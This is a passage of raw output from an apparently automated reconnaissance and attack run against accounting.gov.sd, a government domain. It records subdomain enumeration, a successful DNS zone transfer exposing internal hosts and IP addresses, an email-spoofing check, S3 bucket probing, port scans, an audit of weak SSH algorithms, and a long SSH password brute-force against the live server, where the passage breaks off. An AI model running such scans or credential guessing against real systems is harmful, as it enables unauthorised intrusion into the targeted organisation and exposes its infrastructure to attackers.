  671. Running Source: Archive.is
  672. Running Source: Baidu
  673. Running Source: Bing
  674. Running Source: CertDB
  675. Running Source: CertificateTransparency
  676. Running Source: Certspotter
  677. Running Source: Commoncrawl
  678. Running Source: Crt.sh
  679. Running Source: Dnsdb
  680. Running Source: DNSDumpster
  681. Running Source: DNSTable
  682. Running Source: Dogpile
  683. Running Source: Exalead
  684. Running Source: Findsubdomains
  685. Running Source: Googleter
  686. Running Source: Hackertarget
  687. Running Source: Ipv4Info
  688. Running Source: PTRArchive
  689. Running Source: Sitedossier
  690. Running Source: Threatcrowd
  691. Running Source: ThreatMiner
  692. Running Source: WaybackArchive
  693. Running Source: Yahoo
  694.  
  695. Running enumeration on accounting.gov.sd
  696.  
  697. dnsdb: Unexpected return status 503
  698.  
  699. waybackarchive: Get https://web.archive.org/cdx/search/cdx?url=*.accounting.gov.sd/*&output=json&fl=original&collapse=urlkey&page=: net/http: invalid header field value "http://web.archive.org/cdx/search/cdx?url=*.accounting.gov.sd/*&output=json&fl=original&collapse=urlkey&page=\x00" for key Referer
  700.  
  701.  
  702. Starting Bruteforcing of accounting.gov.sd with 9985 words
  703.  
  704. Total 9 Unique subdomains found for accounting.gov.sd
  705.  
  706. .accounting.gov.sd
  707. mail.accounting.gov.sd
  708. mail.accounting.gov.sd
  709. mssql.accounting.gov.sd
  710. ticket.accounting.gov.sd
  711. webmail.accounting.gov.sd
  712. webmail.accounting.gov.sd
  713. www.accounting.gov.sd
  714. www.accounting.gov.sd
  715. #######################################################################################################################################
  716. [*] Processing domain accounting.gov.sd
  717. [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '205.151.67.6', '205.151.67.34', '205.151.67.2', '2001:18c0:ffe0:2::2', '2001:18c0:ffe0:3::2', '2001:18c0:ffe0:1::2']
  718. [+] Getting nameservers
  719. 62.12.109.2 - ns0.ndc.gov.sd
  720. [+] Zone transfer sucessful using nameserver ns0.ndc.gov.sd
  721. accounting.gov.sd. 86400 IN SOA ns0.ndc.gov.sd. root.ndc.gov.sd. 2018021300 10800 900 604800 86400
  722. accounting.gov.sd. 86400 IN NS ns0.ndc.gov.sd.
  723. accounting.gov.sd. 86400 IN NS ns1.ndc.gov.sd.
  724. accounting.gov.sd. 86400 IN A 62.12.101.14
  725. accounting.gov.sd. 86400 IN MX 10 f03-web01.nic.gov.sd.
  726. accounting.gov.sd. 86400 IN TXT "v=spf1 mx -all"
  727. mail.accounting.gov.sd. 86400 IN A 62.12.105.3
  728. mail.accounting.gov.sd. 86400 IN MX 10 mail.accounting.gov.sd.
  729. mailclient.accounting.gov.sd. 86400 IN A 62.12.101.14
  730. mssql.accounting.gov.sd. 86400 IN A 62.12.105.3
  731. ticket.accounting.gov.sd. 86400 IN A 62.12.101.14
  732. webmail.accounting.gov.sd. 86400 IN CNAME mail.accounting.gov.sd.
  733. www.accounting.gov.sd. 86400 IN A 62.12.101.14
  734. #######################################################################################################################################
  735. [*] Found SPF record:
  736. [*] v=spf1 mx -all
  737. [*] SPF record contains an All item: -all
  738. [*] No DMARC record found. Looking for organizational record
  739. [+] No organizational DMARC record
  740. [+] Spoofing possible for accounting.gov.sd!
  741. #######################################################################################################################################
  742. INFO[0000] Starting to process queue....
  743. INFO[0000] Starting to process permutations....
  744. INFO[0000] FORBIDDEN http://accounting.s3.amazonaws.com (http://accounting.gov.sd)
  745. INFO[0000] FORBIDDEN http://accounting-backup.s3.amazonaws.com (http://accounting.gov.sd)
  746. INFO[0000] FORBIDDEN http://backup-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  747. INFO[0000] FORBIDDEN http://accounting-reports.s3.amazonaws.com (http://accounting.gov.sd)
  748. INFO[0000] FORBIDDEN http://gcp-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  749. INFO[0000] FORBIDDEN http://ec2-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  750. INFO[0000] FORBIDDEN http://data-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  751. INFO[0000] FORBIDDEN http://accounting-data.s3.amazonaws.com (http://accounting.gov.sd)
  752. INFO[0000] FORBIDDEN http://accounting-logs.s3.amazonaws.com (http://accounting.gov.sd)
  753. INFO[0000] FORBIDDEN http://accounting-test.s3.amazonaws.com (http://accounting.gov.sd)
  754. INFO[0000] FORBIDDEN http://s3-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  755. INFO[0000] FORBIDDEN http://accounting-uploads.s3.amazonaws.com (http://accounting.gov.sd)
  756. INFO[0000] FORBIDDEN http://accounting-tools.s3.amazonaws.com (http://accounting.gov.sd)
  757. INFO[0000] FORBIDDEN http://staging-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  758. INFO[0000] FORBIDDEN http://test-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  759. INFO[0000] FORBIDDEN http://dev-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  760. INFO[0000] PUBLIC http://accounting-dev.s3-ap-northeast-1.amazonaws.com/ (http://accounting.gov.sd)
  761. INFO[0000] FORBIDDEN http://aws-accounting.s3.amazonaws.com (http://accounting.gov.sd)
  762. INFO[0001] FORBIDDEN http://accounting-bucket.s3.amazonaws.com (http://accounting.gov.sd)
  763. INFO[0001] FORBIDDEN http://accounting-scripts.s3.amazonaws.com (http://accounting.gov.sd)
  764. #######################################################################################################################################
  765. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:13 EST
  766. Nmap scan report for accounting.gov.sd (62.12.101.14)
  767. Host is up (0.33s latency).
  768. Not shown: 468 filtered ports, 6 closed ports
  769. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  770. PORT STATE SERVICE
  771. 22/tcp open ssh
  772. 80/tcp open http
  773. #######################################################################################################################################
  774. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:16 EST
  775. Nmap scan report for accounting.gov.sd (62.12.101.14)
  776. Host is up (0.064s latency).
  777. Not shown: 2 filtered ports
  778. PORT STATE SERVICE
  779. 53/udp open|filtered domain
  780. 67/udp open|filtered dhcps
  781. 68/udp open|filtered dhcpc
  782. 69/udp open|filtered tftp
  783. 88/udp open|filtered kerberos-sec
  784. 123/udp open|filtered ntp
  785. 139/udp open|filtered netbios-ssn
  786. 161/udp open|filtered snmp
  787. 162/udp open|filtered snmptrap
  788. 389/udp open|filtered ldap
  789. 520/udp open|filtered route
  790. 2049/udp open|filtered nfs
  791. #######################################################################################################################################
  792. # general
  793. (gen) banner: SSH-2.0-OpenSSH_5.3
  794. (gen) software: OpenSSH 5.3
  795. (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
  796. (gen) compression: enabled (zlib@openssh.com)
  797.  
  798. # key exchange algorithms
  799. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
  800. `- [info] available since OpenSSH 4.4
  801. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  802. `- [warn] using weak hashing algorithm
  803. `- [info] available since OpenSSH 2.3.0
  804. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
  805. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  806. (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  807. `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
  808. `- [warn] using small 1024-bit modulus
  809. `- [warn] using weak hashing algorithm
  810. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  811.  
  812. # host-key algorithms
  813. (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  814. (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
  815. `- [warn] using small 1024-bit modulus
  816. `- [warn] using weak random number generator could reveal the key
  817. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  818.  
  819. # encryption algorithms (ciphers)
  820. (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  821. (enc) aes192-ctr -- [info] available since OpenSSH 3.7
  822. (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  823. (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  824. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  825. `- [warn] using weak cipher
  826. `- [info] available since OpenSSH 4.2
  827. (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  828. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  829. `- [warn] using weak cipher
  830. `- [info] available since OpenSSH 4.2
  831. (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  832. `- [warn] using weak cipher mode
  833. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
  834. (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  835. `- [warn] using weak cipher
  836. `- [warn] using weak cipher mode
  837. `- [warn] using small 64-bit block size
  838. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  839. (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  840. `- [fail] disabled since Dropbear SSH 0.53
  841. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  842. `- [warn] using weak cipher mode
  843. `- [warn] using small 64-bit block size
  844. `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
  845. (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  846. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  847. `- [warn] using weak cipher mode
  848. `- [warn] using small 64-bit block size
  849. `- [info] available since OpenSSH 2.1.0
  850. (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  851. `- [warn] using weak cipher mode
  852. `- [info] available since OpenSSH 2.3.0
  853. (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  854. `- [warn] using weak cipher mode
  855. `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
  856. (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  857. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  858. `- [warn] using weak cipher
  859. `- [info] available since OpenSSH 2.1.0
  860. (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  861. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  862. `- [warn] using weak cipher mode
  863. `- [info] available since OpenSSH 2.3.0
  864.  
  865. # message authentication code algorithms
  866. (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  867. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  868. `- [warn] using encrypt-and-MAC mode
  869. `- [warn] using weak hashing algorithm
  870. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  871. (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
  872. `- [warn] using weak hashing algorithm
  873. `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  874. (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
  875. `- [warn] using small 64-bit tag size
  876. `- [info] available since OpenSSH 4.7
  877. (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
  878. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  879. (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
  880. `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  881. (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  882. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  883. `- [warn] using encrypt-and-MAC mode
  884. `- [info] available since OpenSSH 2.5.0
  885. (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  886. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  887. `- [warn] using encrypt-and-MAC mode
  888. `- [info] available since OpenSSH 2.1.0
  889. (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  890. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  891. `- [warn] using encrypt-and-MAC mode
  892. `- [warn] using weak hashing algorithm
  893. `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
  894. (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
  895. `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
  896. `- [warn] using encrypt-and-MAC mode
  897. `- [warn] using weak hashing algorithm
  898. `- [info] available since OpenSSH 2.5.0
  899.  
  900. # algorithm recommendations (for OpenSSH 5.3)
  901. (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
  902. (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
  903. (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
  904. (rec) -ssh-dss -- key algorithm to remove
  905. (rec) -arcfour -- enc algorithm to remove
  906. (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
  907. (rec) -blowfish-cbc -- enc algorithm to remove
  908. (rec) -3des-cbc -- enc algorithm to remove
  909. (rec) -aes256-cbc -- enc algorithm to remove
  910. (rec) -arcfour256 -- enc algorithm to remove
  911. (rec) -cast128-cbc -- enc algorithm to remove
  912. (rec) -aes192-cbc -- enc algorithm to remove
  913. (rec) -arcfour128 -- enc algorithm to remove
  914. (rec) -aes128-cbc -- enc algorithm to remove
  915. (rec) -hmac-md5-96 -- mac algorithm to remove
  916. (rec) -hmac-ripemd160 -- mac algorithm to remove
  917. (rec) -hmac-sha1-96 -- mac algorithm to remove
  918. (rec) -umac-64@openssh.com -- mac algorithm to remove
  919. (rec) -hmac-md5 -- mac algorithm to remove
  920. (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
  921. (rec) -hmac-sha1 -- mac algorithm to remove
  922. #######################################################################################################################################
  923. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 21:17 EST
  924. NSE: [ssh-run] Failed to specify credentials and command to run.
  925. NSE: [ssh-brute] Trying username/password pair: root:root
  926. NSE: [ssh-brute] Trying username/password pair: admin:admin
  927. NSE: [ssh-brute] Trying username/password pair: administrator:administrator
  928. NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
  929. NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
  930. NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
  931. NSE: [ssh-brute] Trying username/password pair: guest:guest
  932. NSE: [ssh-brute] Trying username/password pair: user:user
  933. NSE: [ssh-brute] Trying username/password pair: web:web
  934. NSE: [ssh-brute] Trying username/password pair: test:test
  935. NSE: [ssh-brute] Trying username/password pair: root:
  936. NSE: [ssh-brute] Trying username/password pair: admin:
  937. NSE: [ssh-brute] Trying username/password pair: administrator:
  938. NSE: [ssh-brute] Trying username/password pair: webadmin:
  939. NSE: [ssh-brute] Trying username/password pair: sysadmin:
  940. NSE: [ssh-brute] Trying username/password pair: netadmin:
  941. NSE: [ssh-brute] Trying username/password pair: guest:
  942. NSE: [ssh-brute] Trying username/password pair: user:
  943. NSE: [ssh-brute] Trying username/password pair: web:
  944. NSE: [ssh-brute] Trying username/password pair: test:
  945. NSE: [ssh-brute] Trying username/password pair: root:123456
  946. NSE: [ssh-brute] Trying username/password pair: admin:123456
  947. NSE: [ssh-brute] Trying username/password pair: administrator:123456
  948. NSE: [ssh-brute] Trying username/password pair: webadmin:123456
  949. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456
  950. NSE: [ssh-brute] Trying username/password pair: netadmin:123456
  951. NSE: [ssh-brute] Trying username/password pair: guest:123456
  952. NSE: [ssh-brute] Trying username/password pair: user:123456
  953. NSE: [ssh-brute] Trying username/password pair: web:123456
  954. NSE: [ssh-brute] Trying username/password pair: test:123456
  955. NSE: [ssh-brute] Trying username/password pair: root:12345
  956. NSE: [ssh-brute] Trying username/password pair: admin:12345
  957. NSE: [ssh-brute] Trying username/password pair: administrator:12345
  958. NSE: [ssh-brute] Trying username/password pair: webadmin:12345
  959. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345
  960. NSE: [ssh-brute] Trying username/password pair: netadmin:12345
  961. NSE: [ssh-brute] Trying username/password pair: guest:12345
  962. NSE: [ssh-brute] Trying username/password pair: user:12345
  963. NSE: [ssh-brute] Trying username/password pair: web:12345
  964. NSE: [ssh-brute] Trying username/password pair: test:12345
  965. NSE: [ssh-brute] Trying username/password pair: root:123456789
  966. NSE: [ssh-brute] Trying username/password pair: admin:123456789
  967. NSE: [ssh-brute] Trying username/password pair: administrator:123456789
  968. NSE: [ssh-brute] Trying username/password pair: webadmin:123456789
  969. NSE: [ssh-brute] Trying username/password pair: sysadmin:123456789
  970. NSE: [ssh-brute] Trying username/password pair: netadmin:123456789
  971. NSE: [ssh-brute] Trying username/password pair: guest:123456789
  972. NSE: [ssh-brute] Trying username/password pair: user:123456789
  973. NSE: [ssh-brute] Trying username/password pair: web:123456789
  974. NSE: [ssh-brute] Trying username/password pair: test:123456789
  975. NSE: [ssh-brute] Trying username/password pair: root:password
  976. NSE: [ssh-brute] Trying username/password pair: admin:password
  977. NSE: [ssh-brute] Trying username/password pair: administrator:password
  978. NSE: [ssh-brute] Trying username/password pair: webadmin:password
  979. NSE: [ssh-brute] Trying username/password pair: sysadmin:password
  980. NSE: [ssh-brute] Trying username/password pair: netadmin:password
  981. NSE: [ssh-brute] Trying username/password pair: guest:password
  982. NSE: [ssh-brute] Trying username/password pair: user:password
  983. NSE: [ssh-brute] Trying username/password pair: web:password
  984. NSE: [ssh-brute] Trying username/password pair: test:password
  985. NSE: [ssh-brute] Trying username/password pair: root:iloveyou
  986. NSE: [ssh-brute] Trying username/password pair: admin:iloveyou
  987. NSE: [ssh-brute] Trying username/password pair: administrator:iloveyou
  988. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveyou
  989. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveyou
  990. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveyou
  991. NSE: [ssh-brute] Trying username/password pair: guest:iloveyou
  992. NSE: [ssh-brute] Trying username/password pair: user:iloveyou
  993. NSE: [ssh-brute] Trying username/password pair: web:iloveyou
  994. NSE: [ssh-brute] Trying username/password pair: test:iloveyou
  995. NSE: [ssh-brute] Trying username/password pair: root:princess
  996. NSE: [ssh-brute] Trying username/password pair: admin:princess
  997. NSE: [ssh-brute] Trying username/password pair: administrator:princess
  998. NSE: [ssh-brute] Trying username/password pair: webadmin:princess
  999. NSE: [ssh-brute] Trying username/password pair: sysadmin:princess
  1000. NSE: [ssh-brute] Trying username/password pair: netadmin:princess
  1001. NSE: [ssh-brute] Trying username/password pair: guest:princess
  1002. NSE: [ssh-brute] Trying username/password pair: user:princess
  1003. NSE: [ssh-brute] Trying username/password pair: web:princess
  1004. NSE: [ssh-brute] Trying username/password pair: test:princess
  1005. NSE: [ssh-brute] Trying username/password pair: root:12345678
  1006. NSE: [ssh-brute] Trying username/password pair: admin:12345678
  1007. NSE: [ssh-brute] Trying username/password pair: administrator:12345678
  1008. NSE: [ssh-brute] Trying username/password pair: webadmin:12345678
  1009. NSE: [ssh-brute] Trying username/password pair: sysadmin:12345678
  1010. NSE: [ssh-brute] Trying username/password pair: netadmin:12345678
  1011. NSE: [ssh-brute] Trying username/password pair: guest:12345678
  1012. NSE: [ssh-brute] Trying username/password pair: user:12345678
  1013. NSE: [ssh-brute] Trying username/password pair: web:12345678
  1014. NSE: [ssh-brute] Trying username/password pair: test:12345678
  1015. NSE: [ssh-brute] Trying username/password pair: root:1234567
  1016. NSE: [ssh-brute] Trying username/password pair: admin:1234567
  1017. NSE: [ssh-brute] Trying username/password pair: administrator:1234567
  1018. NSE: [ssh-brute] Trying username/password pair: webadmin:1234567
  1019. NSE: [ssh-brute] Trying username/password pair: sysadmin:1234567
  1020. NSE: [ssh-brute] Trying username/password pair: netadmin:1234567
  1021. NSE: [ssh-brute] Trying username/password pair: guest:1234567
  1022. NSE: [ssh-brute] Trying username/password pair: user:1234567
  1023. NSE: [ssh-brute] Trying username/password pair: web:1234567
  1024. NSE: [ssh-brute] Trying username/password pair: test:1234567
  1025. NSE: [ssh-brute] Trying username/password pair: root:abc123
  1026. NSE: [ssh-brute] Trying username/password pair: admin:abc123
  1027. NSE: [ssh-brute] Trying username/password pair: administrator:abc123
  1028. NSE: [ssh-brute] Trying username/password pair: webadmin:abc123
  1029. NSE: [ssh-brute] Trying username/password pair: sysadmin:abc123
  1030. NSE: [ssh-brute] Trying username/password pair: netadmin:abc123
  1031. NSE: [ssh-brute] Trying username/password pair: guest:abc123
  1032. NSE: [ssh-brute] Trying username/password pair: user:abc123
  1033. NSE: [ssh-brute] Trying username/password pair: web:abc123
  1034. NSE: [ssh-brute] Trying username/password pair: test:abc123
  1035. NSE: [ssh-brute] Trying username/password pair: root:nicole
  1036. NSE: [ssh-brute] Trying username/password pair: admin:nicole
  1037. NSE: [ssh-brute] Trying username/password pair: administrator:nicole
  1038. NSE: [ssh-brute] Trying username/password pair: webadmin:nicole
  1039. NSE: [ssh-brute] Trying username/password pair: sysadmin:nicole
  1040. NSE: [ssh-brute] Trying username/password pair: netadmin:nicole
  1041. NSE: [ssh-brute] Trying username/password pair: guest:nicole
  1042. NSE: [ssh-brute] Trying username/password pair: user:nicole
  1043. NSE: [ssh-brute] Trying username/password pair: web:nicole
  1044. NSE: [ssh-brute] Trying username/password pair: test:nicole
  1045. NSE: [ssh-brute] Trying username/password pair: root:daniel
  1046. NSE: [ssh-brute] Trying username/password pair: admin:daniel
  1047. NSE: [ssh-brute] Trying username/password pair: administrator:daniel
  1048. NSE: [ssh-brute] Trying username/password pair: webadmin:daniel
  1049. NSE: [ssh-brute] Trying username/password pair: sysadmin:daniel
  1050. NSE: [ssh-brute] Trying username/password pair: netadmin:daniel
  1051. NSE: [ssh-brute] Trying username/password pair: guest:daniel
  1052. NSE: [ssh-brute] Trying username/password pair: user:daniel
  1053. NSE: [ssh-brute] Trying username/password pair: web:daniel
  1054. NSE: [ssh-brute] Trying username/password pair: test:daniel
  1055. NSE: [ssh-brute] Trying username/password pair: root:monkey
  1056. NSE: [ssh-brute] Trying username/password pair: admin:monkey
  1057. NSE: [ssh-brute] Trying username/password pair: administrator:monkey
  1058. NSE: [ssh-brute] Trying username/password pair: webadmin:monkey
  1059. NSE: [ssh-brute] Trying username/password pair: sysadmin:monkey
  1060. NSE: [ssh-brute] Trying username/password pair: netadmin:monkey
  1061. NSE: [ssh-brute] Trying username/password pair: guest:monkey
  1062. NSE: [ssh-brute] Trying username/password pair: user:monkey
  1063. NSE: [ssh-brute] Trying username/password pair: web:monkey
  1064. NSE: [ssh-brute] Trying username/password pair: test:monkey
  1065. NSE: [ssh-brute] Trying username/password pair: root:babygirl
  1066. NSE: [ssh-brute] Trying username/password pair: admin:babygirl
  1067. NSE: [ssh-brute] Trying username/password pair: administrator:babygirl
  1068. NSE: [ssh-brute] Trying username/password pair: webadmin:babygirl
  1069. NSE: [ssh-brute] Trying username/password pair: sysadmin:babygirl
  1070. NSE: [ssh-brute] Trying username/password pair: netadmin:babygirl
  1071. NSE: [ssh-brute] Trying username/password pair: guest:babygirl
  1072. NSE: [ssh-brute] Trying username/password pair: user:babygirl
  1073. NSE: [ssh-brute] Trying username/password pair: web:babygirl
  1074. NSE: [ssh-brute] Trying username/password pair: test:babygirl
  1075. NSE: [ssh-brute] Trying username/password pair: root:qwerty
  1076. NSE: [ssh-brute] Trying username/password pair: admin:qwerty
  1077. NSE: [ssh-brute] Trying username/password pair: administrator:qwerty
  1078. NSE: [ssh-brute] Trying username/password pair: webadmin:qwerty
  1079. NSE: [ssh-brute] Trying username/password pair: sysadmin:qwerty
  1080. NSE: [ssh-brute] Trying username/password pair: netadmin:qwerty
  1081. NSE: [ssh-brute] Trying username/password pair: guest:qwerty
  1082. NSE: [ssh-brute] Trying username/password pair: user:qwerty
  1083. NSE: [ssh-brute] Trying username/password pair: web:qwerty
  1084. NSE: [ssh-brute] Trying username/password pair: test:qwerty
  1085. NSE: [ssh-brute] Trying username/password pair: root:lovely
  1086. NSE: [ssh-brute] Trying username/password pair: admin:lovely
  1087. NSE: [ssh-brute] Trying username/password pair: administrator:lovely
  1088. NSE: [ssh-brute] Trying username/password pair: webadmin:lovely
  1089. NSE: [ssh-brute] Trying username/password pair: sysadmin:lovely
  1090. NSE: [ssh-brute] Trying username/password pair: netadmin:lovely
  1091. NSE: [ssh-brute] Trying username/password pair: guest:lovely
  1092. NSE: [ssh-brute] Trying username/password pair: user:lovely
  1093. NSE: [ssh-brute] Trying username/password pair: web:lovely
  1094. NSE: [ssh-brute] Trying username/password pair: test:lovely
  1095. NSE: [ssh-brute] Trying username/password pair: root:654321
  1096. NSE: [ssh-brute] Trying username/password pair: admin:654321
  1097. NSE: [ssh-brute] Trying username/password pair: administrator:654321
  1098. NSE: [ssh-brute] Trying username/password pair: webadmin:654321
  1099. NSE: [ssh-brute] Trying username/password pair: sysadmin:654321
  1100. NSE: [ssh-brute] Trying username/password pair: netadmin:654321
  1101. NSE: [ssh-brute] Trying username/password pair: guest:654321
  1102. NSE: [ssh-brute] Trying username/password pair: user:654321
  1103. NSE: [ssh-brute] Trying username/password pair: web:654321
  1104. NSE: [ssh-brute] Trying username/password pair: test:654321
  1105. NSE: [ssh-brute] Trying username/password pair: root:michael
  1106. NSE: [ssh-brute] Trying username/password pair: admin:michael
  1107. NSE: [ssh-brute] Trying username/password pair: administrator:michael
  1108. NSE: [ssh-brute] Trying username/password pair: webadmin:michael
  1109. NSE: [ssh-brute] Trying username/password pair: sysadmin:michael
  1110. NSE: [ssh-brute] Trying username/password pair: netadmin:michael
  1111. NSE: [ssh-brute] Trying username/password pair: guest:michael
  1112. NSE: [ssh-brute] Trying username/password pair: user:michael
  1113. NSE: [ssh-brute] Trying username/password pair: web:michael
  1114. NSE: [ssh-brute] Trying username/password pair: test:michael
  1115. NSE: [ssh-brute] Trying username/password pair: root:jessica
  1116. NSE: [ssh-brute] Trying username/password pair: admin:jessica
  1117. NSE: [ssh-brute] Trying username/password pair: administrator:jessica
  1118. NSE: [ssh-brute] Trying username/password pair: webadmin:jessica
  1119. NSE: [ssh-brute] Trying username/password pair: sysadmin:jessica
  1120. NSE: [ssh-brute] Trying username/password pair: netadmin:jessica
  1121. NSE: [ssh-brute] Trying username/password pair: guest:jessica
  1122. NSE: [ssh-brute] Trying username/password pair: user:jessica
  1123. NSE: [ssh-brute] Trying username/password pair: web:jessica
  1124. NSE: [ssh-brute] Trying username/password pair: test:jessica
  1125. NSE: [ssh-brute] Trying username/password pair: root:111111
  1126. NSE: [ssh-brute] Trying username/password pair: admin:111111
  1127. NSE: [ssh-brute] Trying username/password pair: administrator:111111
  1128. NSE: [ssh-brute] Trying username/password pair: webadmin:111111
  1129. NSE: [ssh-brute] Trying username/password pair: sysadmin:111111
  1130. NSE: [ssh-brute] Trying username/password pair: netadmin:111111
  1131. NSE: [ssh-brute] Trying username/password pair: guest:111111
  1132. NSE: [ssh-brute] Trying username/password pair: user:111111
  1133. NSE: [ssh-brute] Trying username/password pair: web:111111
  1134. NSE: [ssh-brute] Trying username/password pair: test:111111
  1135. NSE: [ssh-brute] Trying username/password pair: root:ashley
  1136. NSE: [ssh-brute] Trying username/password pair: admin:ashley
  1137. NSE: [ssh-brute] Trying username/password pair: administrator:ashley
  1138. NSE: [ssh-brute] Trying username/password pair: webadmin:ashley
  1139. NSE: [ssh-brute] Trying username/password pair: sysadmin:ashley
  1140. NSE: [ssh-brute] Trying username/password pair: netadmin:ashley
  1141. NSE: [ssh-brute] Trying username/password pair: guest:ashley
  1142. NSE: [ssh-brute] Trying username/password pair: user:ashley
  1143. NSE: [ssh-brute] Trying username/password pair: web:ashley
  1144. NSE: [ssh-brute] Trying username/password pair: test:ashley
  1145. NSE: [ssh-brute] Trying username/password pair: root:000000
  1146. NSE: [ssh-brute] Trying username/password pair: admin:000000
  1147. NSE: [ssh-brute] Trying username/password pair: administrator:000000
  1148. NSE: [ssh-brute] Trying username/password pair: webadmin:000000
  1149. NSE: [ssh-brute] Trying username/password pair: sysadmin:000000
  1150. NSE: [ssh-brute] Trying username/password pair: netadmin:000000
  1151. NSE: [ssh-brute] Trying username/password pair: guest:000000
  1152. NSE: [ssh-brute] Trying username/password pair: user:000000
  1153. NSE: [ssh-brute] Trying username/password pair: web:000000
  1154. NSE: [ssh-brute] Trying username/password pair: test:000000
  1155. NSE: [ssh-brute] Trying username/password pair: root:iloveu
  1156. NSE: [ssh-brute] Trying username/password pair: admin:iloveu
  1157. NSE: [ssh-brute] Trying username/password pair: administrator:iloveu
  1158. NSE: [ssh-brute] Trying username/password pair: webadmin:iloveu
  1159. NSE: [ssh-brute] Trying username/password pair: sysadmin:iloveu
  1160. NSE: [ssh-brute] Trying username/password pair: netadmin:iloveu
  1161. NSE: [ssh-brute] Trying username/password pair: guest:iloveu
  1162. NSE: [ssh-brute] Trying username/password pair: user:iloveu
  1163. NSE: [ssh-brute] Trying username/password pair: web:iloveu
  1164. NSE: [ssh-brute] Trying username/password pair: test:iloveu
  1165. NSE: [ssh-brute] Trying username/password pair: root:michelle
  1166. NSE: [ssh-brute] Trying username/password pair: admin:michelle
  1167. NSE: [ssh-brute] Trying username/password pair: administrator:michelle
  1168. NSE: [ssh-brute] Trying username/password pair: webadmin:michelle
  1169. NSE: [ssh-brute] Trying username/password pair: sysadmin:michelle
